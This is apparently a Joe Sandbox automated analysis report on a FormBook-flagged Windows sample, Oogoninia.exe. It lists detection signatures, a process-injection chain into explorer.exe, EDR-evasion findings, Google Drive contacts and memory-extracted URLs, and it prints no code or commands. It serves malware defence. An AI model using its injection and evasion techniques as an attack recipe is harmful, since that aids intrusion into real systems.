        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529338 Sample: Oogoninia.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 96 28 drive.usercontent.google.com 2->28 30 drive.google.com 2->30 38 Malicious sample detected (through community Yara rule) 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 Yara detected FormBook 2->42 44 2 other signatures 2->44 10 Oogoninia.exe 1 511 2->10         started        signatures3 process4 file5 26 C:\Users\user\AppData\Local\...\System.dll, PE32 10->26 dropped 52 Switches to a custom stack to bypass stack traces 10->52 14 Oogoninia.exe 6 10->14         started        signatures6 process7 dnsIp8 32 drive.google.com 142.250.80.78, 443, 49705 GOOGLEUS United States 14->32 34 drive.usercontent.google.com 142.251.40.129, 443, 49706 GOOGLEUS United States 14->34 54 Modifies the context of a thread in another process (thread injection) 14->54 56 Maps a DLL or memory area into another process 14->56 58 Queues an APC in another process (thread injection) 14->58 60 Found direct / indirect Syscall (likely to bypass EDR) 14->60 18 RAVCpl64.exe 14->18 injected signatures9 process10 signatures11 36 Found direct / indirect Syscall (likely to bypass EDR) 18->36 21 grpconv.exe 18->21         started        process12 signatures13 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Switches to a custom stack to bypass stack traces 21->50 24 explorer.exe 68 1 21->24 injected process14

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Oogoninia.exe39%ReversingLabsWin32.Infostealer.Babar
        Oogoninia.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsqBBFB.tmp\System.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        drive.google.com
        		142.250.80.78
        		truefalse
          		unknown
          drive.usercontent.google.com
          		142.251.40.129
          		truefalse
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 0000000F.00000000.2833665275.000000000DAFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5991554898.000000000DAFB000.00000004.00000001.00020000.00000000.sdmpfalse
              		unknown
              https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/MostlyCloudyNight.pnexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                		unknown
                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gowIexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                  		unknown
                  https://www.msn.com/en-us/news/politics/chris-christie-former-trump-debate-coach-offers-key-pieces-oexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                    		unknown
                    https://api.msn.com/Jexplorer.exe, 0000000F.00000000.2833665275.000000000DAFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5991554898.000000000DAFB000.00000004.00000001.00020000.00000000.sdmpfalse
                      		unknown
                      https://www.msn.com/en-us/sports/nfl/49ers-win-over-jets-ends-with-final-score-that-s-never-been-seeexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                        		unknown
                        https://www.msn.com/en-us/news/us/james-earl-jones-s-talents-went-far-far-beyond-his-magnificent-voiexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                          		unknown
                          https://www.msn.com/en-us/money/retirement/a-youtuber-asked-a-group-of-americans-aged-70-to-80-what-explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                            		unknown
                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyvWexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                              		unknown
                              https://www.msn.com/en-us/money/markets?id=a3oxnmexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                		unknown
                                https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2833665275.000000000DAFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5991554898.000000000DAFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://www.msn.com/en-us/feedexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://www.msn.com/en-us/autos/other/24-used-sports-cars-that-are-notoriously-reliable-yet-crazy-chexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.Oogoninia.exe, 00000002.00000001.1095360708.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                        		unknown
                                        https://www.msn.com/en-us/foodanddrink/recipes/i-asked-3-farmers-the-best-way-to-cook-zucchini-they-explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gowI-darkexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gyvW-darkexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.pngexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://cdn.query.prod.cms.mexplorer.exe, 0000000F.00000002.5985329547.0000000009C3A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C3A000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://excel.office.comexplorer.exe, 0000000F.00000000.2833665275.000000000DAFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5991554898.000000000DAFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDOogoninia.exe, 00000002.00000001.1095360708.0000000000626000.00000020.00000001.01000000.00000006.sdmpfalse
                                                      		unknown
                                                      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Stock_Inexplorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://www.msn.com/en-us/channel/source/AZ%20Animals%20US/sr-vid-7etr9q8xun6k6508c3nufaum0de3dqktiqexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://schemas.microexplorer.exe, 0000000F.00000002.5987815503.000000000A410000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.2825779872.00000000017A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000F.00000000.2831622571.000000000AE70000.00000002.00000001.00040000.00000000.sdmpfalse
                                                            		unknown
                                                            http://www.gopher.ftp://ftp.Oogoninia.exe, 00000002.00000001.1095360708.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                                              		unknown
                                                              https://powerpoint.office.comEMexplorer.exe, 0000000F.00000000.2836002415.000000000E073000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5994248157.000000000E073000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://www.msn.com/en-us/weather/hourlyforecast/in-Santa-Clara%2CCalifornia?loc=eyJsIjoiU2FudGEgQ2xexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://api.msn.com/Bexplorer.exe, 0000000F.00000000.2833665275.000000000DAFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.5991554898.000000000DAFB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://word.office.com64.exeexplorer.exe, 0000000F.00000002.5996841586.0000000011914000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2838101876.0000000011914000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://www.msn.com/en-us/news/crime/dick-van-dyke-forever-young/ar-AA1lDpRDexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://aka.ms/odirmexplorer.exe, 0000000F.00000002.5985932285.0000000009DC1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2830063439.0000000009E31000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://www.google.comOogoninia.exe, 00000002.00000003.1156475256.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156646275.0000000002200000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdOogoninia.exe, 00000002.00000001.1095360708.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
                                                                              		unknown
                                                                              https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNewexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://drive.google.com/Oogoninia.exe, 00000002.00000002.1354263850.0000000002178000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://ntp.msn.com/edge/ntp?cm=en-us&ocid=widgetonlockscreenwin10&cvid=a7af015c-55f5-465b-b0e4-6fefexplorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214Oogoninia.exe, 00000002.00000001.1095360708.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                                                                        		unknown
                                                                                        https://www.msn.com/en-us/news/us/trump-repeats-false-claims-that-children-are-undergoing-transgendeexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://apis.google.comOogoninia.exe, 00000002.00000003.1156475256.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156646275.0000000002200000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://ocsp.quovadisoffshore.com0Oogoninia.exe, 00000002.00000003.1190652532.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266904582.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1190121446.00000000021FC000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1354638492.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266629669.00000000021FC000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156475256.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156646275.0000000002200000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://www.msn.com/en-us/money/retirement/middle-aged-americans-are-leaving-work-for-months-years-texplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition/MostlyCloudyNight.svexplorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://www.msn.com/en-us/money/markets?id=a33k6hexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/Weather/W36_Mostexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3-darkexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwmexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://windows.msn.com:443/shellv2?osLocale=en-US&chosenMarketReason=ImplicitNewexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://www.msn.com/en-us/weather/forecast/in-Santa-Clara%2CCalifornia?loc=eyJsIjoiU2FudGEgQ2xhcmEiLexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://www.msn.com/en-us/money/markets?id=a6qja2explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://www.msn.com/en-us/tv/news/the-bold-the-beautiful-young-and-the-restless-more-get-premiere-daexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://drive.usercontent.google.com/OlGOogoninia.exe, 00000002.00000003.1190652532.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266904582.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1190121446.00000000021FC000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1354638492.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266629669.00000000021FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://outlook.comOexplorer.exe, 0000000F.00000002.5985932285.0000000009DC1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2830063439.0000000009E31000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/earnings/svg/light/blue.svgexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://www.msn.com/en-us/news/politics/jd-vance-spreads-outrageous-lie-about-haitian-immigrants/ar-explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://www.msn.com/en-us/money/personalfinance/18-everyday-household-items-that-are-surprisingly-vaexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://drive.usercontent.google.com/Oogoninia.exe, 00000002.00000003.1190652532.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266904582.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1190121446.00000000021FC000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1354638492.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266629669.00000000021FC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.svgexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                http://nsis.sf.net/NSIS_ErrorErrorOogoninia.exefalse
                                                                                                                                  		unknown
                                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fgwm-darkexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://www.glamour.com/story/shag-haircut-photos-productsexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://www.msn.com/en-us/news/politics/6-things-to-watch-for-when-kamala-harris-debates-donald-trumexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://www.msn.com/en-us/entertainment/news/james-earl-jones-dies-at-93-all-about-his-son-flynn/ar-explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://www.msn.com/en-us/news/crime/tyreek-hill-s-traffic-stop-shows-interactions-with-police-can-bexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            http://nsis.sf.net/NSIS_ErrorOogoninia.exefalse
                                                                                                                                              		unknown
                                                                                                                                              https://www.msn.com/en-us/lifestyle/beauty/40-shag-haircuts-to-inspire-your-next-salon-visit/ss-AA1pexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                https://www.msn.com/en-us/health/medical/2-egg-brands-have-been-recalled-due-to-a-serious-salmonellaexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/20240402.1/WeatherInsight/Wexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdOogoninia.exe, 00000002.00000001.1095360708.00000000005F2000.00000020.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://www.instyle.com/hair/shag-haircut-face-shapeexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        http://www.quovadis.bm0Oogoninia.exe, 00000002.00000003.1190652532.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266904582.00000000021FE000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1190121446.00000000021FC000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1354638492.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1266629669.00000000021FC000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156475256.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156646275.0000000002200000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://api.msn.com/v1/news/Feed/Windows?activityId=DC09251A71C5472DA2BDFD73DC109609&timeOut=5000&ocexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://www.msn.com/en-us/travel/news/scientists-finally-solve-mystery-behind-bermuda-triangle-disapexplorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://www.msn.com/en-us/news/world/gaza-authorities-say-deadly-blasts-hit-humanitarian-zone/ar-AA1explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown

                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                Public IPs

                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                142.251.40.129
                                                                                                                                                                		drive.usercontent.google.comUnited States
                                                                                                                                                                		15169GOOGLEUSfalse
                                                                                                                                                                142.250.80.78
                                                                                                                                                                		drive.google.comUnited States
                                                                                                                                                                		15169GOOGLEUSfalse

                                                                                                                                                                General Information

                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                Analysis ID:1529338
                                                                                                                                                                Start date and time:2024-10-08 21:48:18 +02:00
                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                Overall analysis duration:0h 18m 47s
                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                Report type:full
                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                                Run name:Suspected Instruction Hammering
                                                                                                                                                                Number of analysed new started processes analysed:14
                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                Number of injected processes analysed:2
                                                                                                                                                                Technologies:
                                                                                                                                                                • HCA enabled
                                                                                                                                                                • EGA enabled
                                                                                                                                                                • AMSI enabled
                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                Sample name:Oogoninia.exe
                                                                                                                                                                Detection:MAL
                                                                                                                                                                Classification:mal96.troj.evad.winEXE@5/7@2/2
                                                                                                                                                                EGA Information:
                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                HCA Information:
                                                                                                                                                                • Successful, ratio: 90%
                                                                                                                                                                • Number of executed functions: 65
                                                                                                                                                                • Number of non-executed functions: 300
                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                                                                                Warnings

                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, c.pki.goog
                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                • VT rate limit hit for: Oogoninia.exe

                                                                                                                                                                Simulations

                                                                                                                                                                Behavior and APIs

                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                15:53:01API Interceptor11445442x Sleep call for process: grpconv.exe modified
